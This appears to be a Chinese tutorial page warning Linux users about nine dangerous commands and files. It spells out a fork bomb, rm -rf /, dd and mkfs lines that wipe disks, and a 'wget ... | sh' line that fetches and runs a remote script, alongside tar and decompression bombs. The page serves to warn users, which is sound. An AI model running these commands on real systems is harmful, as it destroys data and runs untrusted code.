9個必須時時警惕的php指令&代碼-php教程-PHP中文網

首頁

後端開發

php教程

9個必須時時警惕的php指令&代碼

伊谢尔伦

Nov 24, 2016 pm 02:31 PM

php php指令

Linux shell/terminal命令非常強大，即使一個簡單的命令就可能導致資料夾、檔案或路徑資料夾等被刪除。

在某些情況下，Linux甚至不會詢問你而直接執行命令，導致你丟失各種資料資訊。

一般來說在Web上推薦新的Linux使用者執行這些指令，當然，也有人哪些寫過這程式碼的人不這麼想，因為這玩意你一寫下去就不是玩笑了。

這裡我收集了一些對系統有危害的Linux程式碼，幫助你避免他們。請記住：這些程式碼非常危險，甚至可以經過修改，變得更有危害性。

還有一些事情要注意：有些指令只在Ubuntu中有sudo前綴時是有危害的。其他發行版本的Linux，則是在作為根目錄命令時會有危害。

1. Linux Fork Bomb Command

:(){ :|: & };: 以Fork Bomb聞名，是一個拒絕服務攻擊的Linux 系統。 :(){ :|: & };: 是一個bash函數。只要被執行，他會不斷重複，直到系統被凍結。

你只能重新啟動系統解決這個問題。所以當你在Linux介面執行這個指令時一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null 也是一個危險的指令。 Dev/null 或 null device 是一個刪除所有寫在這個裝置文件上資料的裝置文件，但是，該操作提示卻是寫入操作執行成功。這就是我們常說的bit bucked 或 black hole。

3. Rm -Rf Command

rm -rf指令在Linux系統中可以快速刪除資料夾及其內容。如果，你不知道如何正確使用它，你就只是哭了。

列下m-rf 命令最常見的組合和選擇：

rm command ：删除Linux系统的文件
rm -f command：不需提示，删除文件中的只读文件
rm -r command 循环删除文件夹的内容
rm -d command ：删除空目录，如果非空目录则不会执行该操作
rm -rf/ command：强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。
rm -rf* command ：强制删除当前目录中的所有内容(当前工作目录)和字文件夹
rm -rf. command：强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]*
The rm -r.[^.]* command ：删除文件及文件夹，带有删除提示

登入後複製

4. Mkfs Command

如果你不知mkfs的作用，那麼它也是一個危險的命令，mkfs之後寫的任何命令都會被一個空白的linux檔案系統格式化、替代。

下面列舉出需要管理員權限，格式化硬碟的指令：

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat

登入後複製

mkfs.cramfs也可以和上面的程式碼做同樣的事情，不過不需要管理來源權限。

5. Tar Bomb

tar指令用於將多個檔案以.tar格式放入一個檔案中(存檔檔案)。 Tape Archive (Tar) bomb可以由他創造。

當為壓縮時，就是這個存檔檔案產生數以萬計的相似名稱檔案出現在目前目錄中而不是新目錄。

當收到tar文件，定期創建一個新的保護目錄，然後在解壓縮前將接受的tar文件放到這個目錄中，你可以避免成為tar bomb的受害者。

6. Dd Command

Dd 指令用於複製&改變硬碟分區。如果，你用錯地方了，那麼也很危險。

下面列舉dd命令：

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda

登入後複製

下面這個命令會將整個主硬盤清零：dd if=/dev/zero of=/dev/had

7. Shell Script Code

有時候，你可能會被人坑，給你一個shell腳本文件，讓你去下載並執行它。該腳本可能會包含一些惡意的或危險的程式碼。命令形式可能會是這樣：wget http://some_malicious_source -O- | sh。 wget將會在sh狹隘腳本時下載腳本。

8. Malicious Source Code

也許有人會給你原始碼讓你編譯他。程式碼可能是正常程式碼，不過，有一些惡意程式碼偽裝在大型原始碼中，如果是這樣，你的系統就中槍了。如何避免?僅接受並編譯可信賴來源的原始碼。

9. Decompression Bomb

你已經收到一個壓縮文件，你被要求提取這個看起來很小的文件，可能小到KB。事實上，該小尺寸的壓縮檔案包含高度壓縮資料。

只要檔案解壓縮，上百GB資料會被提取，這時候，過大的資料填滿硬碟導致宕機，幾率就很大了。如何避免?還是那句老話，別手賤，什麼文件都去接收，請接收可信任來源文件。

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

熱AI工具

熱工具

熱門話題

gmail信箱登陸入口在哪裡

7843

Java教學

1649

CakePHP 教程

1403

Laravel 教程

1300

PHP教程

1241

Related knowledge

適用於 Ubuntu 和 Debian 的 PHP 8.4 安裝和升級指南 Dec 24, 2024 pm 04:42 PM

PHP 8.4 帶來了多項新功能、安全性改進和效能改進，同時棄用和刪除了大量功能。本指南介紹如何在 Ubuntu、Debian 或其衍生版本上安裝 PHP 8.4 或升級到 PHP 8.4

如何設定 Visual Studio Code (VS Code) 進行 PHP 開發 Dec 20, 2024 am 11:31 AM

Visual Studio Code，也稱為 VS Code，是一個免費的原始碼編輯器 - 或整合開發環境 (IDE) - 可用於所有主要作業系統。 VS Code 擁有大量針對多種程式語言的擴展，可以輕鬆編寫

在PHP API中說明JSON Web令牌（JWT）及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一種基於JSON的開放標準，用於在各方之間安全地傳輸信息，主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時，可以生成和驗證JWT，並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大，調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、

php程序在字符串中計數元音 Feb 07, 2025 pm 12:12 PM

字符串是由字符組成的序列，包括字母、數字和符號。本教程將學習如何使用不同的方法在PHP中計算給定字符串中元音的數量。英語中的元音是a、e、i、o、u，它們可以是大寫或小寫。什麼是元音？元音是代表特定語音的字母字符。英語中共有五個元音，包括大寫和小寫： a, e, i, o, u 示例 1 輸入：字符串 = "Tutorialspoint" 輸出：6 解釋字符串 "Tutorialspoint" 中的元音是 u、o、i、a、o、i。總共有 6 個元

您如何在PHP中解析和處理HTML/XML？ Feb 07, 2025 am 11:57 AM

本教程演示瞭如何使用PHP有效地處理XML文檔。 XML（可擴展的標記語言）是一種用於人類可讀性和機器解析的多功能文本標記語言。它通常用於數據存儲

解釋PHP中的晚期靜態綁定（靜態：:)。 Apr 03, 2025 am 12:04 AM

靜態綁定（static::）在PHP中實現晚期靜態綁定（LSB），允許在靜態上下文中引用調用類而非定義類。 1）解析過程在運行時進行，2）在繼承關係中向上查找調用類，3）可能帶來性能開銷。

什麼是PHP魔術方法（__ -construct，__destruct，__call，__get，__ set等）並提供用例？ Apr 03, 2025 am 12:03 AM

PHP的魔法方法有哪些？ PHP的魔法方法包括：1.\_\_construct，用於初始化對象；2.\_\_destruct，用於清理資源；3.\_\_call，處理不存在的方法調用；4.\_\_get，實現動態屬性訪問；5.\_\_set，實現動態屬性設置。這些方法在特定情況下自動調用，提升代碼的靈活性和效率。